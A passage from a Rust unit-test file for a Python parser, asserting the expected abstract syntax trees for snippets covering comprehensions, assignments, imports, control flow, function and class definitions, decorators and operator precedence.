assert_eq!(ast, expected);
let stream = Lexer::new("[a]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::List {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("[a,*b,]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::List {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::Starred {
value: Box::new(
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
),
ctx: ExprContext::Load
}
],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("[a,*b]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn set_creation() {
let stream = Lexer::new("{a}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Set {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a, *b,}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Set {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::Starred {
value: Box::new(
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
),
ctx: ExprContext::Load
}
]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a, *b}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn list_comprehension() {
let stream = Lexer::new("[a for x in y]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::ListComp {
elt: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![]
}
]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("[a for x in y for g in q if True]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::ListComp {
elt: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![]
},
Comprehension::Comprehension {
target: Expression::Name { id: String::from("g"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("q"),
ctx: ExprContext::Load },
ifs: vec![
Expression::NameConstant {
value: Singleton::True
}
]
}
]
}
}
]
};
assert_eq!(ast, expected);
}
// TODO Update with proper contexts, that goes for all tests
#[test]
fn set_comprehension() {
let stream = Lexer::new("{a for x in y}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::SetComp {
elt: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![]
}
]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a for x in y for g in q if True}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::SetComp {
elt: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![]
},
Comprehension::Comprehension {
target: Expression::Name { id: String::from("g"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("q"),
ctx: ExprContext::Load },
ifs: vec![
Expression::NameConstant {
value: Singleton::True
}
]
}
]
}
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn dict_comprehension() {
let stream = Lexer::new("{a:b for x in y}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::DictComp {
key: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
value: Box::new(
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![]
}
]
}
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn assignment() {
let stream = Lexer::new("a = 3\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Assign {
targets: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
value: Expression::Num {
n: Number::DecInteger(String::from("3"))
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("a = yield\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Assign {
targets: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
value: Expression::Yield {
value: None
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("a = b = c = d = 3\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Assign {
targets: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("c"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("d"),
ctx: ExprContext::Load }
],
value: Expression::Num {
n: Number::DecInteger(String::from("3"))
}
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn annotated_assign() {
let stream = Lexer::new("a : int\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::AnnAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
annotation: Expression::Name { id: String::from("int"),
ctx: ExprContext::Load },
value: None
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("a : int = \"hi\"\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::AnnAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
annotation: Expression::Name { id: String::from("int"),
ctx: ExprContext::Load },
value: Some(Expression::Str { s: String::from("hi") })
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn augmented_assign() {
let stream = Lexer::new("a += b; a -= b; a *= b; a @= b; a /= b; a %= b; \
a &= b; a |= b; a ^= b; a <<= b; a >>= b; a **= b; a //= b\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Add,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Sub,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Mult,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::MatMult,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Div,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Mod,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::BitAnd,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::BitOr,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::BitXor,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::LShift,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::RShift,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Pow,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::FloorDiv,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn assert() {
let stream = Lexer::new("assert condition, \"message\"\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Assert {
test: Expression::Name {
id: String::from("condition"),
ctx: ExprContext::Load
},
msg: Some(Expression::Str { s: String::from("message") })
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("assert condition\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Assert {
test: Expression::Name {
id: String::from("condition"),
ctx: ExprContext::Load
},
msg: None
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn import() {
let stream = Lexer::new("import mod\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Import {
names: vec![
Alias::Alias { name: String::from("mod"), asname: None }
]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("import mod1.a.b as m, mod2\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Import {
names: vec![
Alias::Alias {
name: String::from("mod1.a.b"),
asname: Some(String::from("m"))
},
Alias::Alias { name: String::from("mod2"), asname: None }
]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn import_from() {
let stream = Lexer::new("from mod import *\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::ImportFrom {
module: Some(String::from("mod")),
names: vec![
Alias::Alias { name: String::from("*"), asname: None }
],
level: 0
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("from .... mod import a,b,c as g\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::ImportFrom {
module: Some(String::from("mod")),
names: vec![
Alias::Alias { name: String::from("a"), asname: None },
Alias::Alias { name: String::from("b"), asname: None },
Alias::Alias {
name: String::from("c"),
asname: Some(String::from("g"))
}
],
level: 4
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("from .... mod import (a,b,c as g,)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn if_statement() {
let stream = Lexer::new("if a:\n x;y;z\n x = 1\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::If {
test: Expression::Name {
id: String::from("a"), ctx: ExprContext::Load },
body: vec![
Statement::Expr { value: Expression::Name {
id: String::from("x"), ctx: ExprContext::Load
}},
Statement::Expr { value: Expression::Name {
id: String::from("y"), ctx: ExprContext::Load
}},
Statement::Expr { value: Expression::Name {
id: String::from("z"), ctx: ExprContext::Load
}},
Statement::Assign {
targets: vec![
Expression::Name {
id: String::from("x"), ctx: ExprContext::Load }
],
value: Expression::Num {
n: Number::DecInteger(String::from("1")) }
}
],
orelse: vec![]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("if a:\n x;y;z\n x = 1\nelif b:\n func()\n\
else:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::If {
test: Expression::Name {
id: String::from("a"), ctx: ExprContext::Load },
body: vec![
Statement::Expr { value: Expression::Name {
id: String::from("x"), ctx: ExprContext::Load
}},
Statement::Expr { value: Expression::Name {
id: String::from("y"), ctx: ExprContext::Load
}},
Statement::Expr { value: Expression::Name {
id: String::from("z"), ctx: ExprContext::Load
}},
Statement::Assign {
targets: vec![
Expression::Name {
id: String::from("x"), ctx: ExprContext::Load }
],
value: Expression::Num {
n: Number::DecInteger(String::from("1")) }
}
],
orelse: vec![
Statement::If {
test: Expression::Name {
id: String::from("b"), ctx: ExprContext::Load },
body: vec![
Statement::Expr {
value: Expression::Call {
func: Box::new(Expression::Name {
id: String::from("func"),
ctx: ExprContext::Load
}),
args: vec![],
keywords: vec![]
}
}
],
orelse: vec![Statement::Pass]
}
]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn while_statement() {
let stream = Lexer::new("while True:\n continue\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::While {
test: Expression::NameConstant { value: Singleton::True },
body: vec![Statement::Continue],
orelse: vec![]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("while True:\n continue\nelse:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::While {
test: Expression::NameConstant { value: Singleton::True },
body: vec![Statement::Continue],
orelse: vec![Statement::Pass]
}
]
};
assert_eq!(ast, expected);
}
// TODO update with proper context (Store)
#[test]
fn for_statment() {
let stream = Lexer::new("for x in y:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::For {
// TODO ctx should be a Store
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
body: vec![Statement::Pass],
orelse: vec![]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("for x,y in a,b:\n pass\nelse:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::For {
target: Expression::Tuple {
elts: vec![
// TODO ctx's should be a Store
Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
],
ctx: ExprContext::Store
},
iter: Expression::Tuple {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
],
ctx: ExprContext::Load
},
body: vec![Statement::Pass],
orelse: vec![Statement::Pass]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("for x,y, in a,b,:\n pass\nelse:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn with_statment() {
let stream = Lexer::new("with a:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::With {
items: vec![
WithItem::WithItem {
context_expr: Expression::Name {
id: String::from("a"), ctx: ExprContext::Load },
optional_vars: None
}
],
body: vec![Statement::Pass]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("with a as x, b, c as z:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::With {
items: vec![
WithItem::WithItem {
context_expr: Expression::Name {
id: String::from("a"), ctx: ExprContext::Load },
optional_vars: Some(Expression::Name {
id: String::from("x"), ctx: ExprContext::Load })
},
WithItem::WithItem {
context_expr: Expression::Name {
id: String::from("b"), ctx: ExprContext::Load },
optional_vars: None
},
WithItem::WithItem {
context_expr: Expression::Name {
id: String::from("c"), ctx: ExprContext::Load },
optional_vars: Some(Expression::Name {
id: String::from("z"), ctx: ExprContext::Load })
}
],
body: vec![Statement::Pass]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn try_statment() {
let stream = Lexer::new("try:\n x\nfinally:\n fin\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Try {
body: vec![
Statement::Expr {
value: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load }
}
],
handlers: vec![],
orelse: vec![],
finalbody: vec![
Statement::Expr {
value: Expression::Name { id: String::from("fin"),
ctx: ExprContext::Load }
}
]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("try:\n x\nexcept Error as e:\n y\n\
except NewError as e:\n z\nelse:\n pass\nfinally:\n fin\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Try {
body: vec![
Statement::Expr {
value: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load }
}
],
handlers: vec![
ExceptHandler::ExceptHandler {
etype: Some(Expression::Name {
id: String::from("Error"),
ctx: ExprContext::Load
}),
name: Some(String::from("e")),
body: vec![
Statement::Expr {
value: Expression::Name {
id: String::from("y"),
ctx: ExprContext::Load
}
}
]
},
ExceptHandler::ExceptHandler {
etype: Some(Expression::Name {
id: String::from("NewError"),
ctx: ExprContext::Load
}),
name: Some(String::from("e")),
body: vec![
Statement::Expr {
value: Expression::Name {
id: String::from("z"),
ctx: ExprContext::Load
}
}
]
}
],
orelse: vec![
Statement::Pass
],
finalbody: vec![
Statement::Expr {
value: Expression::Name { id: String::from("fin"),
ctx: ExprContext::Load }
}
]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn function_def() {
let stream = Lexer::new("def func():\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::FunctionDef {
name: String::from("func"),
args: Arguments::Arguments {
args: vec![],
vararg: None,
kwonlyargs: vec![],
kw_defaults: vec![],
kwarg: None,
defaults: vec![]
},
body: vec![
Statement::Pass
],
decorator_list: vec![],
returns: None
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("def func(a):\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::FunctionDef {
name: String::from("func"),
args: Arguments::Arguments {
args: vec![
Arg::Arg {
arg: String::from("a"),
annotation: None
}
],
vararg: None,
kwonlyargs: vec![],
kw_defaults: vec![],
kwarg: None,
defaults: vec![]
},
body: vec![
Statement::Pass
],
decorator_list: vec![],
returns: None
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("def func(x,*a:q,b,c,**kwargs:name):\
\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::FunctionDef {
name: String::from("func"),
args: Arguments::Arguments {
args: vec![
Arg::Arg {
arg: String::from("x"),
annotation: None
}
],
vararg: Some(Arg::Arg {
arg: String::from("a"),
annotation: Some(Expression::Name {
id: String::from("q"),
ctx: ExprContext::Load
})
}),
kwonlyargs: vec![
Arg::Arg {
arg: String::from("b"),
annotation: None
},
Arg::Arg {
arg: String::from("c"),
annotation: None
}
],
kw_defaults: vec![
Expression::None,
Expression::None
],
kwarg: Some(Arg::Arg {
arg: String::from("kwargs"),
annotation: Some(Expression::Name {
id: String::from("name"),
ctx: ExprContext::Load
})
}),
defaults: vec![]
},
body: vec![
Statement::Pass
],
decorator_list: vec![],
returns: None
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("def func(x,z=2,*,a:q,b,c,**kwargs:name) \
-> rtn:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::FunctionDef {
name: String::from("func"),
args: Arguments::Arguments {
args: vec![
Arg::Arg {
arg: String::from("x"),
annotation: None
},
Arg::Arg {
arg: String::from("z"),
annotation: None
}
],
vararg: None,
kwonlyargs: vec![
Arg::Arg {
arg: String::from("a"),
annotation: Some(Expression::Name {
id: String::from("q"),
ctx: ExprContext::Load
})
},
Arg::Arg {
arg: String::from("b"),
annotation: None
},
Arg::Arg {
arg: String::from("c"),
annotation: None
}
],
kw_defaults: vec![
Expression::None,
Expression::None,
Expression::None
],
kwarg: Some(Arg::Arg {
arg: String::from("kwargs"),
annotation: Some(Expression::Name {
id: String::from("name"),
ctx: ExprContext::Load
})
}),
defaults: vec![
Expression::Num {
n: Number::DecInteger(String::from("2"))
}
]
},
body: vec![
Statement::Pass
],
decorator_list: vec![],
returns: Some(Expression::Name { id: String::from("rtn"),
ctx: ExprContext::Load })
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("def func(x,z=2,*,a:q,b,c,**kwargs:name,) \
-> rtn:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn lambda_def() {
let stream = Lexer::new("lambda x,y: x+y\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Lambda {
args: Box::new(Arguments::Arguments {
args: vec![
Arg::Arg {
arg: String::from("x"),
annotation: None
},
Arg::Arg {
arg: String::from("y"),
annotation: None
}
],
vararg: None,
kwonlyargs: vec![],
kw_defaults: vec![],
kwarg: None,
defaults: vec![]
}),
body: Box::new(Expression::BinOp {
left: Box::new(Expression::Name {
id: String::from("x"), ctx: ExprContext::Load }),
op: Operator::Add,
right: Box::new(Expression::Name {
id: String::from("y"), ctx: ExprContext::Load })
}),
}
}
]
};
assert_eq!(ast, expected);
// lambdef_nocond test
let stream = Lexer::new("[a for x in y if lambda x,y: x+y]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::ListComp {
elt: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![
Expression::Lambda {
args: Box::new(Arguments::Arguments {
args: vec![
Arg::Arg {
arg: String::from("x"),
annotation: None
},
Arg::Arg {
arg: String::from("y"),
annotation: None
}
],
vararg: None,
kwonlyargs: vec![],
kw_defaults: vec![],
kwarg: None,
defaults: vec![]
}),
body: Box::new(Expression::BinOp {
left: Box::new(Expression::Name {
id: String::from("x"),
ctx: ExprContext::Load
}),
op: Operator::Add,
right: Box::new(Expression::Name {
id: String::from("y"),
ctx: ExprContext::Load
})
}),
}
]
}
]
}
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn class_def() {
let stream = Lexer::new("class C(base1,base2,base3):\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::ClassDef {
name: String::from("C"),
bases: vec![
Expression::Name {
id: String::from("base1"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("base2"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("base3"),
ctx: ExprContext::Load
}
],
keywords: vec![],
body: vec![
Statement::Pass
],
decorator_list: vec![]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("class C(base, key=word, **kwargs):\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::ClassDef {
name: String::from("C"),
bases: vec![
Expression::Name {
id: String::from("base"),
ctx: ExprContext::Load
}
],
keywords: vec![
Keyword::Keyword {
arg: Some(String::from("key")),
value: Expression::Name {
id: String::from("word"),
ctx: ExprContext::Load
}
},
Keyword::Keyword {
arg: None,
value: Expression::Name {
id: String::from("kwargs"),
ctx: ExprContext::Load
}
}
],
body: vec![
Statement::Pass
],
decorator_list: vec![]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn decorated_defs() {
let stream = Lexer::new("@dec.a.b.c(x,y,z)\ndef func():\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::FunctionDef {
name: String::from("func"),
args: Arguments::Arguments {
args: vec![],
vararg: None,
kwonlyargs: vec![],
kw_defaults: vec![],
kwarg: None,
defaults: vec![]
},
body: vec![
Statement::Pass
],
decorator_list: vec![
Expression::Call {
func: Box::new(Expression::Attribute {
value: Box::new(Expression::Attribute {
value: Box::new(Expression::Attribute {
value: Box::new(Expression:: Name {
id: String::from("dec"),
ctx: ExprContext::Load
}),
attr: String::from("a"),
ctx: ExprContext::Load
}),
attr: String::from("b"),
ctx: ExprContext::Load
}),
attr: String::from("c"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("z"),
ctx: ExprContext::Load }
],
keywords: vec![]
}
],
returns: None
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("@dec.a.b.c(x,y,z,)\n@time\nclass C(base, \
key=word, **kwargs):\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::ClassDef {
name: String::from("C"),
bases: vec![
Expression::Name {
id: String::from("base"),
ctx: ExprContext::Load
}
],
keywords: vec![
Keyword::Keyword {
arg: Some(String::from("key")),
value: Expression::Name {
id: String::from("word"),
ctx: ExprContext::Load
}
},
Keyword::Keyword {
arg: None,
value: Expression::Name {
id: String::from("kwargs"),
ctx: ExprContext::Load
}
}
],
body: vec![
Statement::Pass
],
decorator_list: vec![
Expression::Call {
func: Box::new(Expression::Attribute {
value: Box::new(Expression::Attribute {
value: Box::new(Expression::Attribute {
value: Box::new(Expression:: Name {
id: String::from("dec"),
ctx: ExprContext::Load
}),
attr: String::from("a"),
ctx: ExprContext::Load
}),
attr: String::from("b"),
ctx: ExprContext::Load
}),
attr: String::from("c"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("z"),
ctx: ExprContext::Load }
],
keywords: vec![]
},
Expression::Name {
id: String::from("time"),
ctx: ExprContext::Load
}
]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn associativity() {
let stream = Lexer::new("1 + 2 + 3 + 4 + 5\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("2"))
})
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("3"))
})
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("4"))
})
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("5"))
})
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("1 + 2 * 3 + 4\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
op: Operator::Add,
right: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("2"))
}),
op: Operator::Mult,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("3"))
})
}),
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("4"))
})
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("1 + 2 | 3 & 4 << 5 ** 6 - 7\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("2"))
})
}),
op: Operator::BitOr,
right: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("3"))
}),
op: Operator::BitAnd,
right: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("4"))
}),
op: Operator::LShift,
right: Box::new(Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("5"))
}),
op: Operator::Pow,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("6"))
})
}),
op: Operator::Sub,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("7"))
})
})
})
})
}
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn comparison_ops() {
let stream = Lexer::new("1 < 2 > 3 == 4 >= 5 <= 6 != 7 in a \
not in b is c is not d\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Compare {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
ops: vec![
CmpOperator::LT,
CmpOperator::GT,
CmpOperator::EQ,
CmpOperator::GE,
CmpOperator::LE,
CmpOperator::NE,
CmpOperator::In,
CmpOperator::NotIn,
CmpOperator::Is,
CmpOperator::IsNot
],
comparators: vec![
Expression::Num {
n: Number::DecInteger(String::from("2"))
},
Expression::Num {
n: Number::DecInteger(String::from("3"))
},
Expression::Num {
n: Number::DecInteger(String::from("4"))
},
